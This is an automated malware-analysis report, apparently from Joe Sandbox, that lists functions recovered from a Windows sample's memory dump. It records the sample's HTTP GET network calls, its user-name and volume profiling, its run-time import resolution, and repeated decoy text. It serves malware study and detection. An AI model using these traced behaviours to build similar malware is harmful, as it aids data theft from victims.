Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: 9ce53dd9e62066443c1dd0cc8ef6aeb5f1bded3e63991dcfff7b257ffc4279d5
Instruction ID: 166a75d6eabd6dd01270b6db7d38ce92c95256833e8e8c93fb1777f75cfa2e21
Opcode Fuzzy Hash: 9ce53dd9e62066443c1dd0cc8ef6aeb5f1bded3e63991dcfff7b257ffc4279d5
Instruction Fuzzy Hash: E44102617E260C6EC678FBE4884EEBFBA665F47700F519064EB00523A0EFB0550287B7

Function 00CD62D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00CEAAF6

Part of subcall function 00CD4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00CD4889
Part of subcall function 00CD4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00CD4899

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

InternetOpenA.WININET(00CF0DFF,00000001,00000000,00000000,00000000), ref: 00CD6331
StrCmpCA.SHLWAPI(?,0159E410), ref: 00CD6353
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CD6385
HttpOpenRequestA.WININET(00000000,GET,?,0159D9F8,00000000,00000000,00400100,00000000), ref: 00CD63D5
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00CD640F
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CD6421
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00CD644D
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00CD64BD
InternetCloseHandle.WININET(00000000), ref: 00CD653F
InternetCloseHandle.WININET(00000000), ref: 00CD6549
InternetCloseHandle.WININET(00000000), ref: 00CD6553

Strings

ERROR, xrefs: 00CD6519
ERROR, xrefs: 00CD6457
GET, xrefs: 00CD63CC

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3749127164-2509457195
Opcode ID: ddeacba7d070e65a591bbad441636074de3d1451a9b232627a9622c8f6e9c04a
Instruction ID: c9be7dd65681bc981708006d304a2c94d49b9a118b5a3e4d69cd17a34d3a72d0
Opcode Fuzzy Hash: ddeacba7d070e65a591bbad441636074de3d1451a9b232627a9622c8f6e9c04a
Instruction Fuzzy Hash: C2716FB1A00358EFDB24EFA0DC55FEE7774AB44700F108199F60A6B290DBB46A84DF51

Function 00CE7690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00CE76D2
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CE770F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CE7793
RtlAllocateHeap.NTDLL(00000000), ref: 00CE779A
wsprintfA.USER32 ref: 00CE77D0

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

Strings

C, xrefs: 00CE76DC
:, xrefs: 00CE76EC
\, xrefs: 00CE76F0

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 1544550907-3809124531
Opcode ID: de387e6bbac2b098e66e7f5ebc254455f0367d95397d559b6076382961e19f4f
Instruction ID: 29028268d13fc76888879ee335f0aa9ea6e87ff144fc3e045ac4ca6cfcef5c96
Opcode Fuzzy Hash: de387e6bbac2b098e66e7f5ebc254455f0367d95397d559b6076382961e19f4f
Instruction Fuzzy Hash: 844191B1D04388ABDB10DB95CC85FEEBBB8AF08704F104199F609AB280D7746A44DBA5

Function 00CE79E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00CD11B7), ref: 00CE7A10
RtlAllocateHeap.NTDLL(00000000), ref: 00CE7A17
GetUserNameA.ADVAPI32(00000104,00000104), ref: 00CE7A2F

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: b6d9c223e9ae2c966943cfa230760107f9fee5e444755db3ed034e0a5b442de2
Instruction ID: a6620cb9d794b36e334f736c766a40cb165bb09849bf967581a9d0c124b9ca8c
Opcode Fuzzy Hash: b6d9c223e9ae2c966943cfa230760107f9fee5e444755db3ed034e0a5b442de2
Instruction Fuzzy Hash: A1F04FB2948349EBC700DF99DD45FAEBBB8EB45711F10022AFA15A3680C77515008BA1

Function 00CD1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 00CD116A
ExitProcess.KERNEL32 ref: 00CD117E

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: f930ae6878ba11ccb48832f54430fbde10b6c01a4a9c8f1055e5808cbd443677
Instruction ID: 9fd4a07c4796dd63f7d21725bac106ba1c39806732a33312c82adf3362fc9110
Opcode Fuzzy Hash: f930ae6878ba11ccb48832f54430fbde10b6c01a4a9c8f1055e5808cbd443677
Instruction Fuzzy Hash: 18D09EB490431CABCB04EFE09D49ADDBBB8FB0D615F140555DD0562340EA316455CB65

Function 00CE9F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,015868E0), ref: 00CE9F3D
GetProcAddress.KERNEL32(75900000,01586880), ref: 00CE9F55
GetProcAddress.KERNEL32(75900000,01598FB8), ref: 00CE9F6E
GetProcAddress.KERNEL32(75900000,01598EF8), ref: 00CE9F86
GetProcAddress.KERNEL32(75900000,0159CF70), ref: 00CE9F9E
GetProcAddress.KERNEL32(75900000,0159CF88), ref: 00CE9FB7
GetProcAddress.KERNEL32(75900000,0158B630), ref: 00CE9FCF
GetProcAddress.KERNEL32(75900000,0159CE98), ref: 00CE9FE7
GetProcAddress.KERNEL32(75900000,0159CE08), ref: 00CEA000
GetProcAddress.KERNEL32(75900000,0159CE20), ref: 00CEA018
GetProcAddress.KERNEL32(75900000,0159CE38), ref: 00CEA030
GetProcAddress.KERNEL32(75900000,015866A0), ref: 00CEA049
GetProcAddress.KERNEL32(75900000,015867A0), ref: 00CEA061
GetProcAddress.KERNEL32(75900000,015868A0), ref: 00CEA079
GetProcAddress.KERNEL32(75900000,01586900), ref: 00CEA092
GetProcAddress.KERNEL32(75900000,0159CEB0), ref: 00CEA0AA
GetProcAddress.KERNEL32(75900000,0159CEC8), ref: 00CEA0C2
GetProcAddress.KERNEL32(75900000,0158B400), ref: 00CEA0DB
GetProcAddress.KERNEL32(75900000,015869A0), ref: 00CEA0F3
GetProcAddress.KERNEL32(75900000,0159CFA0), ref: 00CEA10B
GetProcAddress.KERNEL32(75900000,0159CF58), ref: 00CEA124
GetProcAddress.KERNEL32(75900000,0159CEF8), ref: 00CEA13C
GetProcAddress.KERNEL32(75900000,0159CDF0), ref: 00CEA154
GetProcAddress.KERNEL32(75900000,01586940), ref: 00CEA16D
GetProcAddress.KERNEL32(75900000,0159CF28), ref: 00CEA185
GetProcAddress.KERNEL32(75900000,0159CE50), ref: 00CEA19D
GetProcAddress.KERNEL32(75900000,0159CF40), ref: 00CEA1B6
GetProcAddress.KERNEL32(75900000,0159CE68), ref: 00CEA1CE
GetProcAddress.KERNEL32(75900000,0159CEE0), ref: 00CEA1E6
GetProcAddress.KERNEL32(75900000,0159CE80), ref: 00CEA1FF
GetProcAddress.KERNEL32(75900000,0159CF10), ref: 00CEA217
GetProcAddress.KERNEL32(75900000,0159C910), ref: 00CEA22F
GetProcAddress.KERNEL32(75900000,0159CA48), ref: 00CEA248
GetProcAddress.KERNEL32(75900000,01599DC8), ref: 00CEA260
GetProcAddress.KERNEL32(75900000,0159C988), ref: 00CEA278
GetProcAddress.KERNEL32(75900000,0159CA60), ref: 00CEA291
GetProcAddress.KERNEL32(75900000,015867E0), ref: 00CEA2A9
GetProcAddress.KERNEL32(75900000,0159CAC0), ref: 00CEA2C1
GetProcAddress.KERNEL32(75900000,015869C0), ref: 00CEA2DA
GetProcAddress.KERNEL32(75900000,0159C958), ref: 00CEA2F2
GetProcAddress.KERNEL32(75900000,0159CA78), ref: 00CEA30A
GetProcAddress.KERNEL32(75900000,015864C0), ref: 00CEA323
GetProcAddress.KERNEL32(75900000,01586620), ref: 00CEA33B
LoadLibraryA.KERNEL32(0159C940,?,00CE5EF3,00CF0AEB,?,?,?,?,?,?,?,?,?,?,00CF0AEA,00CF0AE7), ref: 00CEA34D
LoadLibraryA.KERNEL32(0159C850,?,00CE5EF3,00CF0AEB,?,?,?,?,?,?,?,?,?,?,00CF0AEA,00CF0AE7), ref: 00CEA35E
LoadLibraryA.KERNEL32(0159C9E8,?,00CE5EF3,00CF0AEB,?,?,?,?,?,?,?,?,?,?,00CF0AEA,00CF0AE7), ref: 00CEA370
LoadLibraryA.KERNEL32(0159CAD8,?,00CE5EF3,00CF0AEB,?,?,?,?,?,?,?,?,?,?,00CF0AEA,00CF0AE7), ref: 00CEA382
LoadLibraryA.KERNEL32(0159C9B8,?,00CE5EF3,00CF0AEB,?,?,?,?,?,?,?,?,?,?,00CF0AEA,00CF0AE7), ref: 00CEA393
LoadLibraryA.KERNEL32(0159C868,?,00CE5EF3,00CF0AEB,?,?,?,?,?,?,?,?,?,?,00CF0AEA,00CF0AE7), ref: 00CEA3A5
LoadLibraryA.KERNEL32(0159CA90,?,00CE5EF3,00CF0AEB,?,?,?,?,?,?,?,?,?,?,00CF0AEA,00CF0AE7), ref: 00CEA3B7
LoadLibraryA.KERNEL32(0159CA00,?,00CE5EF3,00CF0AEB,?,?,?,?,?,?,?,?,?,?,00CF0AEA,00CF0AE7), ref: 00CEA3C8
GetProcAddress.KERNEL32(75FD0000,01586640), ref: 00CEA3EA
GetProcAddress.KERNEL32(75FD0000,0159C880), ref: 00CEA402
GetProcAddress.KERNEL32(75FD0000,01598B40), ref: 00CEA41A
GetProcAddress.KERNEL32(75FD0000,0159C898), ref: 00CEA433
GetProcAddress.KERNEL32(75FD0000,01586360), ref: 00CEA44B
GetProcAddress.KERNEL32(734B0000,0158B1D0), ref: 00CEA470
GetProcAddress.KERNEL32(734B0000,015863A0), ref: 00CEA489
GetProcAddress.KERNEL32(734B0000,0158B040), ref: 00CEA4A1
GetProcAddress.KERNEL32(734B0000,0159C808), ref: 00CEA4B9
GetProcAddress.KERNEL32(734B0000,0159C8B0), ref: 00CEA4D2
GetProcAddress.KERNEL32(734B0000,01586500), ref: 00CEA4EA
GetProcAddress.KERNEL32(734B0000,015865E0), ref: 00CEA502
GetProcAddress.KERNEL32(734B0000,0159CAA8), ref: 00CEA51B
GetProcAddress.KERNEL32(763B0000,01586560), ref: 00CEA53C
GetProcAddress.KERNEL32(763B0000,015862E0), ref: 00CEA554
GetProcAddress.KERNEL32(763B0000,0159C9D0), ref: 00CEA56D
GetProcAddress.KERNEL32(763B0000,0159C9A0), ref: 00CEA585
GetProcAddress.KERNEL32(763B0000,01586400), ref: 00CEA59D
GetProcAddress.KERNEL32(750F0000,0158AF50), ref: 00CEA5C3
GetProcAddress.KERNEL32(750F0000,0158AED8), ref: 00CEA5DB
GetProcAddress.KERNEL32(750F0000,0159CA18), ref: 00CEA5F3
GetProcAddress.KERNEL32(750F0000,01586600), ref: 00CEA60C
GetProcAddress.KERNEL32(750F0000,01586660), ref: 00CEA624
GetProcAddress.KERNEL32(750F0000,0158B0E0), ref: 00CEA63C
GetProcAddress.KERNEL32(75A50000,0159C928), ref: 00CEA662
GetProcAddress.KERNEL32(75A50000,015862A0), ref: 00CEA67A
GetProcAddress.KERNEL32(75A50000,01598A10), ref: 00CEA692
GetProcAddress.KERNEL32(75A50000,0159C820), ref: 00CEA6AB
GetProcAddress.KERNEL32(75A50000,0159CA30), ref: 00CEA6C3
GetProcAddress.KERNEL32(75A50000,01586280), ref: 00CEA6DB
GetProcAddress.KERNEL32(75A50000,01586440), ref: 00CEA6F4
GetProcAddress.KERNEL32(75A50000,0159C8C8), ref: 00CEA70C
GetProcAddress.KERNEL32(75A50000,0159C838), ref: 00CEA724
GetProcAddress.KERNEL32(75070000,015864A0), ref: 00CEA746
GetProcAddress.KERNEL32(75070000,0159C970), ref: 00CEA75E
GetProcAddress.KERNEL32(75070000,0159C7F0), ref: 00CEA776
GetProcAddress.KERNEL32(75070000,0159C8E0), ref: 00CEA78F
GetProcAddress.KERNEL32(75070000,0159C8F8), ref: 00CEA7A7
GetProcAddress.KERNEL32(74E50000,01586420), ref: 00CEA7C8
GetProcAddress.KERNEL32(74E50000,01586580), ref: 00CEA7E1
GetProcAddress.KERNEL32(75320000,015864E0), ref: 00CEA802
GetProcAddress.KERNEL32(75320000,0159CD60), ref: 00CEA81A
GetProcAddress.KERNEL32(6F060000,015865A0), ref: 00CEA840
GetProcAddress.KERNEL32(6F060000,01586300), ref: 00CEA858
GetProcAddress.KERNEL32(6F060000,015862C0), ref: 00CEA870
GetProcAddress.KERNEL32(6F060000,0159CD18), ref: 00CEA889
GetProcAddress.KERNEL32(6F060000,01586460), ref: 00CEA8A1
GetProcAddress.KERNEL32(6F060000,01586480), ref: 00CEA8B9
GetProcAddress.KERNEL32(6F060000,015865C0), ref: 00CEA8D2
GetProcAddress.KERNEL32(6F060000,01586320), ref: 00CEA8EA
GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00CEA901
GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00CEA917
GetProcAddress.KERNEL32(74E00000,0159CCE8), ref: 00CEA939
GetProcAddress.KERNEL32(74E00000,01598A30), ref: 00CEA951
GetProcAddress.KERNEL32(74E00000,0159CC28), ref: 00CEA969
GetProcAddress.KERNEL32(74E00000,0159CCB8), ref: 00CEA982
GetProcAddress.KERNEL32(74DF0000,01586520), ref: 00CEA9A3
GetProcAddress.KERNEL32(6F9C0000,0159CCA0), ref: 00CEA9C4
GetProcAddress.KERNEL32(6F9C0000,01586340), ref: 00CEA9DD
GetProcAddress.KERNEL32(6F9C0000,0159CB98), ref: 00CEA9F5
GetProcAddress.KERNEL32(6F9C0000,0159CDC0), ref: 00CEAA0D

Strings

InternetSetOptionA, xrefs: 00CEA8F5
HttpQueryInfoA, xrefs: 00CEA90C

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: 3b030abb2f6ac53ae828e839bca367574b4f1d99933b29d6b4e8fc52134c648a
Instruction ID: 8425807dbe0095264d71828c6d58f791bfe534e3a348fe7e4bb258fadf5668ee
Opcode Fuzzy Hash: 3b030abb2f6ac53ae828e839bca367574b4f1d99933b29d6b4e8fc52134c648a
Instruction Fuzzy Hash: C4620CF66183089FC344EFA8ED88E667BF9A78F701714851AB909C3270D735A941EF64

Function 00CD48D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00CEAAF6

Part of subcall function 00CD4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00CD4889
Part of subcall function 00CD4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00CD4899

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00CD4965
StrCmpCA.SHLWAPI(?,0159E410), ref: 00CD498A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CD4B0A
